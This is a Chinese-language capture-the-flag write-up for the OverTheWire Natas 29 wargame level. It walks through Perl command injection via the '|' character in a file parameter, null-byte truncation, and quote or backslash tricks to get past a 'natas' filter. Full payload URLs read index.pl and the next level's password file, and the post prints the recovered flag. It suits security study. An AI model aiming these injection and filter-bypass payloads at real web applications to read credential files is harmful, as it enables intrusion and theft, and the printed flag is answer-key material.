zoukankan      html  css  js  c++  java
  • Natas29 Writeup(Perl命令注入、00截断、绕过过滤)

    Natas29:

    本关打开后,可以看到一个下拉列表,选择不同的内容,会得到不同的大量文本的页面。

    观察url部分:http://natas29.natas.labs.overthewire.org/index.pl?file=perl+underground

    感觉是一个命令注入,尝试一下file=|ls %00,可以在页面底部看到文件列表,由此我们确定存在命令注入漏洞。

    尝试注入命令直接获取natas30的密码,结果并没有显示出密码。

    payload:http://natas29.natas.labs.overthewire.org/index.pl?file=|cat%20/etc/natas_webpass/natas30+%20%00

    由于刚才返回的文件列表中有index.pl,我们可以尝试打开index.pl来查看源码。

    payload:http://natas29.natas.labs.overthewire.org/index.pl?file=|cat+index.pl%00

    我们看到,源码过滤了natas,导致显示meeeeeep!。我们可以将其绕过,从而得到flag。

    payload:http://natas29.natas.labs.overthewire.org/index.pl?file=|cat+/etc/na%22%22tas_webpass/nat%22%22as30%00

    这里绕过过滤的方式有多种,比如

    • 双引号绕过:file=|cat+/etc/na%22%22tas_webpass/nat%22%22as30%00
    • 单引号绕过:ffile=|cat+/etc/n%27%27atas_webpass/n%27%27atas30%00
    • 反斜杠绕过:ffile=|cat+/etc/natas_webpass/natas30%00
    • 等等

    flag:wie9iexae0Daihohv8vuu3cei9wahf0e

    总结:

    1.在perl中“|”字符会将命令连接到脚本中。
    2.URL中,空格可以用“+”或者“%20”表示,双引号(")可以用“%22”表示。
    3.%00会被url解码成0x00,导致00截断。
    4.00截断原理:截断漏洞出现的核心就是chr(0),这个字符不为空 (Null),也不是空字符 (“”),更不是空格。当程序在输出含有 chr(0)变量时,chr(0)后面的数据会被停止,换句话说,就是误把它当成结束符,后面的数据直接忽略,这就导致了漏洞产生。
    5.perl中,open()函数可以执行shell命令。
    6.在shell命令注入漏洞中,有多种方式可以绕过过滤,详看这里
    7.开发过程中,应尽量少用可以执行命令的函数,如果必须要用,一定要做好过滤。

    参考:

    https://blog.csdn.net/baidu_35297930/article/details/99974886?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task
    https://blog.csdn.net/silence1_/article/details/96135760

  • 相关阅读:
    js重要函数
    js判断是否为空
    checkbox选择框如果被选中value值就可以传过去,没有被选中value就不能穿过去(调试了近一天,坑爹的说)
    js常用点
    常用jdbc操作
    java.sql.SQLException: 索引中丢失 IN 或 OUT 参数:: 1
    com.sun.org.apache.xerces.internal.impl.io.MalformedByteSequenceException: 3 字节的 UTF-8 序列的字节 2 无效 待整理
    OOAD和UML
    .net 外部CSS文件不起作用总结
    线程读书笔记
  • 原文地址:https://www.cnblogs.com/zhengna/p/12362804.html
Copyright © 2011-2022 走看看